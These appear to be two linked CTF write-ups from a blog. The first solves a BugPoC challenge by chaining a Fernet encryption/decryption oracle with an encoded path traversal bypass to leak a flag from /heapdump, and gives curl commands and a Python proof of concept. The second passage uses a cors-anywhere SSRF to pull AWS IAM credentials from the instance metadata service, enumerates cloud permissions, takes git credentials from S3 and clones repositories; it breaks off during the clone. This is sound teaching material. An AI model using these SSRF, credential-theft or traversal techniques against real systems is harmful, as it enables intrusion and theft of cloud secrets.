We discovered another internal endpoint! But now what? What else can we do? :thinking:

Encryption & Decryption Oracles

Recall that earlier, we had to generate a fingerprint before using the /get-dogs endpoint to fetch the respective page of dog images. Let’s take a closer look at the endpoint request and response again carefully:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Notice that the fingerprint returned in the JSON response starts with gAAAAAB too, indicating that the string may very well be a ciphertext produced using Fernet! What if we try to supply this fingerprint value as the x-param header value instead of one of the four pre-defined Base-64 strings?

$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Interesting! It looks like we are able to successfully decrypt the fingerprint value. This indicates that the encryption key used for generating the four hardcoded Base-64 strings in the JavaScript file is also the same for generating the encrypted fingerprint value.

We can infer the following from the above output:

  • The fingerprint contains a serialised JSON object: {"UA": request.headers["User-Agent"]}.
  • The /get-dogs endpoint creates an URL to be fetched on the server-side by concatenating the protocol (e.g. http://), backend host (e.g. localhost), port (e.g. 80), the string /dogs, and the decrypted x-param header value. In other words, the server-side request URL is formed using: 'http://localhost:80/dogs' + decrypt(request.headers['x-param']).

In addition, we now know that we have a encryption oracle (using /fingerprint endpoint with a custom User-Agent header value) and a decryption oracle (using /get-dogs endpoint with a custom x-param header value containing the ciphertext). These provides us powerful primitives – we can create valid ciphertexts for our chosen plaintext (although with some data prepended/appended due to JSON serialisation) and use the generated ciphertexts to tamper with the request path in the server-side request!

Getting to the /heapdump

Let’s take a closer look at how we can tamper with the request path:

$ curl -s -H 'User-Agent: TEST' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgku7UVOl_To_pUd7J1qzYfOJvbEhVqpa_7DN_7m5YZI0np1jfXoVzWSRROrWQy4bxWuYylza3pUMZffRv5DZ2DPQZsA==
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"TEST\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Since we can’t modify the prepended /dogs string, the server-side request will always use a relative path beginning with /dogs. What we can do is to perform a path traversal attack to access another endpoint besides /dogs as such:

  • Set User-Agent header value to /../heapdump#
  • This results in the URL to be requested to be something like: http://localhost/dogs{"UA": "/../heapdump#"}, which may be normalised by the webserver to be: http://localhost/heapdump.

Note: Since the hash fragment is not actually a part of a URL, it (usually) isn’t sent to the server. Most webservers also ignore the hash fragment, so we can effectively get rid of the trailing "} produced by the JSON serialisation. You could also use ? to force the trailing "} to be treated as a query string parameter, but some applications may not like that :)

Let’s try out the attack idea:

$ curl -s -H 'User-Agent: /../heapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvSr7zNtRXxDO14Y37625vSYXQ9Ma8YwdxnEuWyV9cxCVzprPIl60ped_DSlpq2l2QKuAXbbSvRu479zVF97tMj4A-W8IEu5I6qpruHDf2w8Bm8
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/heapdump#\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

It seems like ../ is being stripped from the request path. There’s actually two bypasses for it.

The first solution is that because ../ is only stripped once globally and not done recursively, supplying ..././ will end up being ../, which is exactly what we wanted!

The second solution is to use a URL-encoded path traversal payloads such as ..%2f, .%2e/, %2e%2e%2f instead of ../. This works because the most webservers URL-decodes the request path before routing it to the application. We can easily verify this behaviour is indeed existent:

$ curl https://doggo-api.buggywebsite.com/fingerprint/..%2fdogs
Error, this endpoint is only internally accessible

Clearly, we ended up getting routed to the /dogs internal endpoint instead of the publicly-accessible /fingerprint endpoint, proving that this is indeed working.

Now, let’s go get the flag!

$ curl -s -H 'User-Agent: /..%2fheapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvWY5SmGJUpySKZn2AjGP27q41C6DKljy3Xkg08fQZfvnvSCbAse2k_Dmx_JaVKN-QaOzgSQq2Nz_pIpDTUYMdhbdd_kjH9q1d1llgnKoECvB7o=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2fheapdump#\"}", "statusCode": 200, "body": "\"name,size,value;__name__,57,lambda_function;__doc__,56,None;__package__,60,;__loader__,59,<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>;__spec__,57,ModuleSpec(name='lambda_function', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>, origin='/var/task/lambda_function.py');__file__,57,/var/task/lambda_function.py;__cached__,59,/var/task/__pycache__/lambda_function.cpython-38.pyc;__builtins__,61,{'__name__': 'builtins', '__doc__': \\\"Built-in functions, exceptions, and other objects.\\\\n\\\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.\\\", '__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins', loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__': <built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>, 'ascii': <built-in function ascii>, 'bin': <built-in function bin>, 'breakpoint': <built-in function breakpoint>, 'callable': <built-in function callable>, 'chr': <built-in function chr>, 'compile': <built-in function compile>, 'delattr': <built-in function delattr>, 'dir': <built-in function dir>, 'divmod': <built-in function divmod>, 'eval': <built-in function eval>, 'exec': <built-in function exec>, 'format': <built-in function format>, 'getattr': <built-in function getattr>, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>, 'hash': <built-in function hash>, 'hex': <built-in function hex>, 'id': <built-in function id>, 'input': <built-in function input>, 'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation.\\nAll Rights Reserved.\\n\\nCopyright (c) 2000 BeOpen.com.\\nAll Rights Reserved.\\n\\nCopyright (c) 1995-2001 Corporation for National Research Initiatives.\\nAll Rights Reserved.\\n\\nCopyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.\\nAll Rights Reserved., 'credits':     Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands\\n    for supporting Python development.  See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.};json,53,<module 'json' from '/var/lang/lib/python3.8/json/__init__.py'>;sys,52,<module 'sys' (built-in)>;SECRET_API_KEY,63,flag{gr8_job_h@cker};get_memory,59,<function get_memory at 0x7f9e03fb1160>;verify_internal_request,72,<function verify_internal_request at 0x7f9e03fb1280>;lambda_handler,63,<function lambda_handler at 0x7f9e03fb1310>;\""}

Near the end of the heap dump, we see the flag :)

Solution

To summarise, the following observations and steps were led us to the flag:

  1. There is an internal endpoint (found through fuzzing) at /heapdump that dumps memory, including SECRET_API_KEY variable which contains the flag.
  2. The publicly-accessible /get-dogs endpoint appends the decrypted x-param header value in the requested path as such: '/dogs' + decrypt(request.headers['x-param']).
  3. The publicly-accessible /fingerprint endpoint generates the encrypted value of: {"UA": request.headers["User-Agent"]}, which gives rise to an encryption oracle.
  4. Although the /get-dogs endpoint has some prevention against path traversal (e.g. stripping ../ from the request path), it is still possible to achieve path traversal using URL-encoding / to %2f.
  5. Leveraging /fingerprint endpoint to generate the encrypted value of a path traversal payload, and supplying the generated fingerprint as the x-param header in the /get-dogs endpoint allows us to access the internal /heapdump endpoint and leak the flag.

For a valid solution submission, participants need to submit a proof-of-concept (PoC) hosted on BugPoC.
For simplicity, I opted to use their Python PoC to demonstrate the attack chain:

#!/usr/bin/env python3
import re
import requests

def main():
  endpoint = '/heapdump'
  path_traversal_payload = ('/..' + endpoint + '#').replace('/', '%2f')
  encrypted = requests.get('https://doggo-api.buggywebsite.com/fingerprint', headers={'User-Agent': path_traversal_payload}).json()['fingerprint']
  r = requests.get('https://doggo-api.buggywebsite.com/get-dogs', headers={'x-param': encrypted, 'x-fingerprint': 'a'})
  flag = re.search('SECRET_API_KEY[^;]+', r.text).group().split(',')
  flag[1] = ': '
  return ''.join(flag)

Running the proof-of-concept code using BugPoC’s Python PoC returns the following response containing the flag:

SECRET_API_KEY: flag{gr8_job_h@cker}

Memory Leak Proof-of-Concept

Challenge solved! :tada:

Closing Thoughts & Tips

As you might have noted by now, it is never a good idea to re-use the same encryption key for multiple purposes. An attacker who has access to encryption/decryption oracle can potentially trigger unintentional behaviours (as well-demonstrated in this challenge). There were a couple of times I observed the re-use of JWT signing key for both production and staging servers, which can be leveraged to achieve account takeover on the production server! :wink:

There are also a few tricks we can use to perform better testing, which I did not mention in the write-up for brevity. Firstly, we were hunting endpoints from an external perspective. In addition to fuzzing endpoints from an external perspective, the path traversal bug in the server-side request to discover endpoints should also be leveraged to fuzz from the internal perspective.

Next, the path traversal payload (i.e. ..%2f) was specifically targeting the webserver’s URL path normalisation behaviour. Do note that there is no guarantee that it will work in real life, because we can’t know for sure which webserver is actually being used on the backend! There could be multiple reverse proxies used, or there could be none at all – it all depends, and we can only enumerate and do a bit of guessing-and-checking to confirm our suspicions!

Another thing we could have done is to leverage the /fingerprint endpoint to identify how the request is being fetched by the application:

$ curl -s -H 'User-Agent: /..%2ffingerprint#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkv0VCFdQy6oMxc1yJDY2WYHSKloG6Ik-OXHQ4Bw9CjgmAiO9j71e8rP_mJ0MM989mlsUiAlZaoPwsHr7vBd8a-E3tteAm4j4XJ1ASyXYJULa5-Y=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2ffingerprint#\"}", "statusCode": 200, "body": "{\"fingerprint\": \"gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU\"}"}
$ curl -H "x-fingerprint: actually this value isn't validated" -H "x-param: gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"python-requests/2.22.0\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

From the User-Agent string, we can infer that the URL is likely to be fetched using Requests Python library on the sever-side. We could also possibly examine and target a specific behaviour of the HTTP client used in our attack as well. For instance, did you know that urllib accepts “wrapped” URLs? Check out this writeup by @Gladiator to see how this behaviour was being used to bypass a WAF in a CTF challenge!

I hope you enjoyed the write-up. :smiley:
Thanks BugPoC/@NahamSec for the fun challenge!

Here’s my write-up on yet another cloud challenge with no solves titled Keep The Clouds Together... in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and complex than the other cloud challenges in the competition, further highlighting the difficulties in penetration testing of infrastructures involving multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted on an Amazon S3 Bucket in ap-southeast-1 region named punggol-digital-lock-portal. From the note, we can learn there is a index.html object in the punggol-digital-lock-portal S3 bucket and we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html: S3 Bucket /index.html

As what the notes mentioned, the list of affected individuals indeed failed to load.
Let’s take a peek at the JavaScript code included by the webpage:

1
2
3
4
5
6
7
8
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch a JSON containing the list of affected individuals from an IP address 122.248.230.66 belonging to Amazon Elastic Computing (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is being deployed, allowing us to be able to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that the port 8080 appears to be inaccessible, hence the list of victims could not be loaded successfully.
Perhaps, the webserver is not even hosted locally!

Since we have identified the IP address 122.248.230.66 is an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information such as temporary IAM access keys from AWS Instance Metadata service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for punggol-digital-lock-service assumed role user.
Here’s a quick recap on our progress before we continue on: Initial Entrypoint Progress

Enumerating punggol-digital-lock-service Role

I used WeirdAAL to automate the enumerate the permitted actions for the assumed role user user and AWS CLI v1.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use it to access git repositories hosted on AWS CodeCommit source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
